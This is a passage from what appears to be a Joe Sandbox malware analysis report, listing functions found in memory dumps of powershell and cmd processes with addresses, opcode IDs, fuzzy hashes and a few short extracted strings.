                                      • Source File: 00000017.00000002.1458354654.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ddbfb351c58f7b85d26095288fe583cb7fd24bf27582280c0c95667a77f0621a
                                      • Instruction ID: 48012cbab7bb54c83da745afc4f33a6dbba8b5eaf926b215b73639eea36d0dad
                                      • Opcode Fuzzy Hash: ddbfb351c58f7b85d26095288fe583cb7fd24bf27582280c0c95667a77f0621a
                                      • Instruction Fuzzy Hash: 1731EB7191CB489FDB1C9B5CA8466F97BE0FB99710F10412FE44993292DA70AC56CBC2
                                      Function 00007FF886F967FA Relevance: .1, Instructions: 126COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458919213.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886f90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8c47664302d8d720618a00d5cc293cb1ded2d84ba94232973c4464f264d9497
                                      • Instruction ID: d2a90bf75e450ff654f28294cf1cced87498bab48012974b1481bd267e8f0bd9
                                      • Opcode Fuzzy Hash: d8c47664302d8d720618a00d5cc293cb1ded2d84ba94232973c4464f264d9497
                                      • Instruction Fuzzy Hash: E231C232A0DA898FFB59DAA86491AB8B7D1EF59260F1805BFC44DC7183D919DC15C341
                                      Function 00007FF886DAE620 Relevance: .1, Instructions: 126COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1457771013.00007FF886DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DAD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886dad000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d3ac78920499f7b367aac8b8949c27e6931bdac0df54b75b1b658813e94911b8
                                      • Instruction ID: b3057952874d450c4790c91a426117572ab8138f24457cf4a325c79699047833
                                      • Opcode Fuzzy Hash: d3ac78920499f7b367aac8b8949c27e6931bdac0df54b75b1b658813e94911b8
                                      • Instruction Fuzzy Hash: 3641387180DBC44FE3579B28A8459563FF0FF52361B1909EFD089CB1A3D629AC46C7A2
                                      Function 00007FF886ECA47C Relevance: .1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458354654.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 119527eaaf2623b55ad2c8844c2fe66e5b28f891e5c2badd2624f4c41eb327f7
                                      • Instruction ID: dec3cd0aaa3d1d61378b79324b41336c0b6e8ffd9466724784a0d95db38be4ba
                                      • Opcode Fuzzy Hash: 119527eaaf2623b55ad2c8844c2fe66e5b28f891e5c2badd2624f4c41eb327f7
                                      • Instruction Fuzzy Hash: 1721283090CB4C8FEB59DBAC984A7E97FF0EB96320F04426FD048C7152DA749816CB92
                                      Function 00007FF886ECA06A Relevance: .1, Instructions: 82COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458354654.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69edf4e073b4bd4512da3e8fe005a8714e18739c01302a6869d4d9c9da02c005
                                      • Instruction ID: 45d3819f0cd43c28526952c0d6b9026901d2f65c4c8cb8d58243a0e92ccfc414
                                      • Opcode Fuzzy Hash: 69edf4e073b4bd4512da3e8fe005a8714e18739c01302a6869d4d9c9da02c005
                                      • Instruction Fuzzy Hash: E321C827D2D5C64ED712AB6C58A60F97F60FF16395B0D42B2D0DC8B093FE196846C781
                                      Function 00007FF886EC33B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458354654.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 976781344dbf165b0bc228b5a914b48c9825343b1ef8d7c2b40864421cab0ba3
                                      • Instruction ID: d493bced6f0f229820341bce70742010e774709bc502ce1b7581384b2b0363b9
                                      • Opcode Fuzzy Hash: 976781344dbf165b0bc228b5a914b48c9825343b1ef8d7c2b40864421cab0ba3
                                      • Instruction Fuzzy Hash: 2801677111CB0C4FD744EF0CE455AA5B7E0FB95364F10056DE58AC3651DA36E882CB46
                                      Function 00007FF886F9414D Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458919213.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886f90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ef9ab0789ef1d5794757b7caac6ecb0df7c09e2b7af0caa9c99b5f6d1bdec4de
                                      • Instruction ID: b5dea72f603506c8a643886eff644fc700df67cf60cc3c94e9de1756fcaa4e46
                                      • Opcode Fuzzy Hash: ef9ab0789ef1d5794757b7caac6ecb0df7c09e2b7af0caa9c99b5f6d1bdec4de
                                      • Instruction Fuzzy Hash: 5BF0BE32A1C5088FD799EA4CE4004A873E0FF6536071100BAE15DC71A3CA2AEC90C745
                                      Function 00007FF886F94400 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458919213.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886f90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5ba8160a6dd4c5bf5a85584be5173ddda5dd7839250108ef09e7df06b5e22a8e
                                      • Instruction ID: fc86cee8d0b3d45ae300499edffc9b953807c96f3a54ace0f81d149d0cebbeb4
                                      • Opcode Fuzzy Hash: 5ba8160a6dd4c5bf5a85584be5173ddda5dd7839250108ef09e7df06b5e22a8e
                                      • Instruction Fuzzy Hash: C9F05832A1C5488FEB98EA5CE4419A8B7E0FF55360B5500B6E159CB4A3DA2AEC44CB52
                                      Function 00007FF886F941D1 Relevance: .0, Instructions: 29COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458919213.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886f90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction ID: 344eb1d4d584511f726fc2af4910336a4f723dbd921df00a4d8dbb4cae2ff2e3
                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction Fuzzy Hash: F1E01A31B1C808CFDA69DA0CE0409A973E1FBA936171101B7D14EC7661CA22ECA1CB80

                                      Non-executed Functions

                                      Function 00007FF886EC8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458354654.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M_^4$M_^7$M_^F$M_^J
                                      • API String ID: 0-622050427
                                      • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                      • Instruction ID: 9aafc0f55125b1e99a1cd71a10b245d1f992cd7a35f488af5b252ed43f4fbb2d
                                      • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                      • Instruction Fuzzy Hash: 9B210B776185659ED3027FBDBC08AD93B40CFA42B478547B2E199CF093FE18B0868AD1

                                      Executed Functions

                                      Function 00007FF886EB3545 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Y_H
                                      • API String ID: 0-219585648
                                      • Opcode ID: 8631cba56d010d2cd580f8a464aeafe0709e870678917189d244898fcbbb8a0e
                                      • Instruction ID: f7258de7c5b44be1572dfc674b3b483984579cfcadba612082c52a90b86d61eb
                                      • Opcode Fuzzy Hash: 8631cba56d010d2cd580f8a464aeafe0709e870678917189d244898fcbbb8a0e
                                      • Instruction Fuzzy Hash: 8E91C271E289498FE794DBA8D8593E9BBE1FF6A350F54017AC00EE72CADF685801C741
                                      Function 00007FF886EB0515 Relevance: .4, Instructions: 388COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe2fbd040911f6413725c3723afe3563915c53dc1fca11c5935fe193411900bd
                                      • Instruction ID: 46da97bfff9c85499692a2a209e2050eb6566326d769298eaa5592b13377f8eb
                                      • Opcode Fuzzy Hash: fe2fbd040911f6413725c3723afe3563915c53dc1fca11c5935fe193411900bd
                                      • Instruction Fuzzy Hash: 5CB12607E0D6D24EE21176ACB8592F97F90FF922A5B1C81B7D08C9E0D7DD18AC4AC295
                                      Function 00007FF886EB05A0 Relevance: .3, Instructions: 316COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9556d8eacc547ddee0ff391c7263931c761df9680f19a2adcefbdbe7b902c476
                                      • Instruction ID: 64b8cd2facba43180e62a5798fb5c8b1c61fa3e6e61e8d4afc19949f2f9aebd5
                                      • Opcode Fuzzy Hash: 9556d8eacc547ddee0ff391c7263931c761df9680f19a2adcefbdbe7b902c476
                                      • Instruction Fuzzy Hash: 38912803E0D6D24EE21166BCB8592F96F90FF912A5F1C81B7D08CAE0D7DD18AC4AC295
                                      Function 00007FF886EB05ED Relevance: .3, Instructions: 306COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0b3deed561b7c75fb03de71d8dbce39860de39346d3c6cfb980acd7cf57868bd
                                      • Instruction ID: 9751d4342a94016a54ef93e1b25aefe8eface09f826a788b8da2be75e56adb45
                                      • Opcode Fuzzy Hash: 0b3deed561b7c75fb03de71d8dbce39860de39346d3c6cfb980acd7cf57868bd
                                      • Instruction Fuzzy Hash: 60912712E0D6D24FE21166BCB8592F97F90FF922A1B1C81F7D0889E0D7DD18AC4AC395
                                      Function 00007FF886EB16B8 Relevance: .3, Instructions: 285COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 952cacd90d23d99c8bd64da47c7fe90538f8da8ee5ee6b153237ad173f24c8d7
                                      • Instruction ID: 932d674c3ec7b0efc881c18e2f7f0b770b118fa3143ce4f840cd120cc55dc890
                                      • Opcode Fuzzy Hash: 952cacd90d23d99c8bd64da47c7fe90538f8da8ee5ee6b153237ad173f24c8d7
                                      • Instruction Fuzzy Hash: A881BE31A1CA498BDB58DE1C98956B977E2FFD8750F28017ED44ED3286DE34AC02C781
                                      Function 00007FF886EB0640 Relevance: .3, Instructions: 267COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ed830c267192e22b6fc98651a1685c4a4e0d3812f6d24bae5c0adc1771c64002
                                      • Instruction ID: 643f0fdc5cf5cfaa5a7fd3892a708f21d9ad24afdcd7868be6cd0b60410e01c6
                                      • Opcode Fuzzy Hash: ed830c267192e22b6fc98651a1685c4a4e0d3812f6d24bae5c0adc1771c64002
                                      • Instruction Fuzzy Hash: 3F711912E0D6D14FE21166BCB8592F96F90FF912A1F1C81F7D0899E0DBDC58AC4AC295
                                      Function 00007FF886EB0638 Relevance: .2, Instructions: 190COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be9842fc13542e35f4f32ba56046e47fce3f0b2bca9fd1078a34e8b318d9d2f0
                                      • Instruction ID: 3f30107b863401dbec20e3c3748d4395438a1019c9fff694adbb9adf4086799d
                                      • Opcode Fuzzy Hash: be9842fc13542e35f4f32ba56046e47fce3f0b2bca9fd1078a34e8b318d9d2f0
                                      • Instruction Fuzzy Hash: D3512812E1D6924FE31166BCA8592E57FA0FF513A0F1C81B7D088EA0D7DD18AC4AC391
                                      Function 00007FF886EB1CED Relevance: .2, Instructions: 189COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d193ebf66b2a6687fcf82214f080bd1b4824194ee74c29b373ae35a7aab4118
                                      • Instruction ID: f0e39d49e56a9bdc4502a13fcf2ec0513fd26acd807234ed635d6c5649c9cafe
                                      • Opcode Fuzzy Hash: 4d193ebf66b2a6687fcf82214f080bd1b4824194ee74c29b373ae35a7aab4118
                                      • Instruction Fuzzy Hash: DD51E131A18B894FDB59DE1888956BA77E2FFD8751B28417ED44ED7281CE34EC02CB81
                                      Function 00007FF886EB31A5 Relevance: .1, Instructions: 147COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e05ec0a59f8c03b63d5fc154a8113eee88862548f19cc6ba7bc4d24f8d27a463
                                      • Instruction ID: ed36903f9fc795abe40738e7b7f9608bd7bafe86cb0f7b7478b701e7f3d62017
                                      • Opcode Fuzzy Hash: e05ec0a59f8c03b63d5fc154a8113eee88862548f19cc6ba7bc4d24f8d27a463
                                      • Instruction Fuzzy Hash: 07514874D1861D8FEB54EB98C49A6FDBBF1FF59350F68007AD009E7292DA38A844CB41
                                      Function 00007FF886EB0488 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 967944ec8e886d556195cecd1501df68ca0a8b9e79d597fb2add77ca6174f2a0
                                      • Instruction ID: 1a33b12306840b0d3d7e81d7021cde13b45bfd52d6a4c826231be37a12ce4cbd
                                      • Opcode Fuzzy Hash: 967944ec8e886d556195cecd1501df68ca0a8b9e79d597fb2add77ca6174f2a0
                                      • Instruction Fuzzy Hash: 4A21DE17A0D2924FE311B7ADF8A52E93F60DF9227970D41B3D1CC8D053DD0C684A97A6
                                      Function 00007FF886EB0805 Relevance: .1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c45bc81c5559a32ef4d161a420ff0bdd0777ff7f9f87a1f85dcfcd8daef5026a
                                      • Instruction ID: e912a78284dd9db980c8723a406c8454dcb20597d0f3f9467cfdddb8ce1379d2
                                      • Opcode Fuzzy Hash: c45bc81c5559a32ef4d161a420ff0bdd0777ff7f9f87a1f85dcfcd8daef5026a
                                      • Instruction Fuzzy Hash: D4213B62E1C6829BE701667CDC5A2E97BA0FF51364F0C41B7D448E9083EE18A956C2D1
                                      Function 00007FF886EB3277 Relevance: .1, Instructions: 79COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 51fccaee187ad4a9ac841bac4cd6fe4b537c32a8664eeeccd89ad5a50c096535
                                      • Instruction ID: 520aa85febe154f724d72bb6a7471ab74c884f9e55ed7a9142154641866d3829
                                      • Opcode Fuzzy Hash: 51fccaee187ad4a9ac841bac4cd6fe4b537c32a8664eeeccd89ad5a50c096535
                                      • Instruction Fuzzy Hash: FE21C275D1851D8FEB58EB98C49A6FCBBF1FF58341F64402AD00DE7295DA386880CB50
                                      Function 00007FF886EB2189 Relevance: .1, Instructions: 76COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: df73d265a61b811b239e78abbd931531a701265a409c862d6ee081b63134c443
                                      • Instruction ID: be761b8b9d8a5de994411e5b04666cb0e9e0583507b7bab4c169e4a15456c1fb
                                      • Opcode Fuzzy Hash: df73d265a61b811b239e78abbd931531a701265a409c862d6ee081b63134c443
                                      • Instruction Fuzzy Hash: 2111DF30E1855A4FE746EB78841A2B877E0EF4A380F5804B6D44DD74A3DE28A889C752
                                      Function 00007FF886EB339F Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b5a13d0ea305c1bbb926ac37a491344150d408a0e662f991943d624217dcf66f
                                      • Instruction ID: 65284e4d0da2451d0d16e5a93572b0a3542d472d13e431aa97dfd8e7a689ac7c
                                      • Opcode Fuzzy Hash: b5a13d0ea305c1bbb926ac37a491344150d408a0e662f991943d624217dcf66f
                                      • Instruction Fuzzy Hash: BF21013080D69A8FDB42EB74885C6E97FF0FF0A350F0944FAD448CB062DA399846C711
                                      Function 00007FF886EB0A01 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d7752131ca59cbfacbe8edd4f05dc0bba30e31d62a06cbaa1d4b430c6bcb785e
                                      • Instruction ID: 6cf009015aafbafde95d48de2809ade48f663812f0e52998ceecf68116bdae7b
                                      • Opcode Fuzzy Hash: d7752131ca59cbfacbe8edd4f05dc0bba30e31d62a06cbaa1d4b430c6bcb785e
                                      • Instruction Fuzzy Hash: 3A116035E1855E8FE791EB68C8492BD77E0FF58350F5809B6C40DE71A2EE38A944CB41
                                      Function 00007FF886EB112D Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fe71baab67eabe4a85eed27f1708a8717099233bc36dc5c585a557a9fff8449
                                      • Instruction ID: 1ab8d45c5744d7e8a6f6a466b43fc5c70f373c0cb24f395bda911202a0b7ecdf
                                      • Opcode Fuzzy Hash: 0fe71baab67eabe4a85eed27f1708a8717099233bc36dc5c585a557a9fff8449
                                      • Instruction Fuzzy Hash: D611E270D1865A8EEB599B6884583F97BF0FF69360F2804BEC40AE71D2DE356848C741
                                      Function 00007FF886EB0F58 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f37f8c528b5ace73a2bcf3df769ef3d456d2ea2bf492f82c737d8b82725028af
                                      • Instruction ID: b9ccd1214162d810ab6b374329e02a42c542e821b0cee43377847bb93130310d
                                      • Opcode Fuzzy Hash: f37f8c528b5ace73a2bcf3df769ef3d456d2ea2bf492f82c737d8b82725028af
                                      • Instruction Fuzzy Hash: CE115431E18A0A8AEB55EB54C855BEDB7A1FF54350F344279C009B7195CE387D42CB84
                                      Function 00007FF886EB34C5 Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 51baedfedeec129f7b1630beb3294be1ec2122713e49212008d93a28fbe914a1
                                      • Instruction ID: 00283fce5c56df459f1ecfd69ef2d6a5067bea56b5a0950e51b3e159f997c73f
                                      • Opcode Fuzzy Hash: 51baedfedeec129f7b1630beb3294be1ec2122713e49212008d93a28fbe914a1
                                      • Instruction Fuzzy Hash: C6118E7091864E8FDB95EF64885A6BD7BF0FF18340F5404BED419D7192DB39A940CB01
                                      Function 00007FF886EB2E31 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 187bf45c215fa3693190160eb742d17fe6b179701dcbc437012e3d9b342abb82
                                      • Instruction ID: 663f8e9f4c75b72599cf7f4f842a8e5bf46515b4c65d9195a7be89c338a427c8
                                      • Opcode Fuzzy Hash: 187bf45c215fa3693190160eb742d17fe6b179701dcbc437012e3d9b342abb82
                                      • Instruction Fuzzy Hash: F0018F31D1D64E8FEB52EB7484496BD7BE0FF19340F9909B6D408D70A2EA38E844C741
                                      Function 00007FF886EB05D8 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5651eaa5204f5c765152c9abcc744ca2c95022cdb2da528db4b0e6f09e22b256
                                      • Instruction ID: 3416d697ef6b74ea7d264aaac80a0d52de96b5d4240dc7a1dc61bdfcda3f5929
                                      • Opcode Fuzzy Hash: 5651eaa5204f5c765152c9abcc744ca2c95022cdb2da528db4b0e6f09e22b256
                                      • Instruction Fuzzy Hash: 52019A3091890E8FEB89EF24C0596FA77A1FF58354F64057ED40ED7294CA36A990CB80
                                      Function 00007FF886EB280D Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 45bba6dd6f04570ea3fb06a2f39894c9bc618ce16a585011c7cc78b0d5d1cf20
                                      • Instruction ID: 03f98b66cea2b6e5ea8eaaf72d1b5f9849d73395ba37fe2d792a1ba9a2166c82
                                      • Opcode Fuzzy Hash: 45bba6dd6f04570ea3fb06a2f39894c9bc618ce16a585011c7cc78b0d5d1cf20
                                      • Instruction Fuzzy Hash: E6018F30D1864D8FE791AB64844A2F97BF0FF59340F9945B6D408D70A2EE38E984C741
                                      Function 00007FF886EB2EA9 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d60465ec4210787c5d311ee31a28ecec098a3f5e6689bdf1139be1aee059182e
                                      • Instruction ID: 2ad830d1c52544f904f062ac977106fe520626c2b61fbbe35548449a61243360
                                      • Opcode Fuzzy Hash: d60465ec4210787c5d311ee31a28ecec098a3f5e6689bdf1139be1aee059182e
                                      • Instruction Fuzzy Hash: 0D018431D1D68A4FE752EB74885A5B97BF0FF49340F5909F7D408DB0A2EA28A894C701
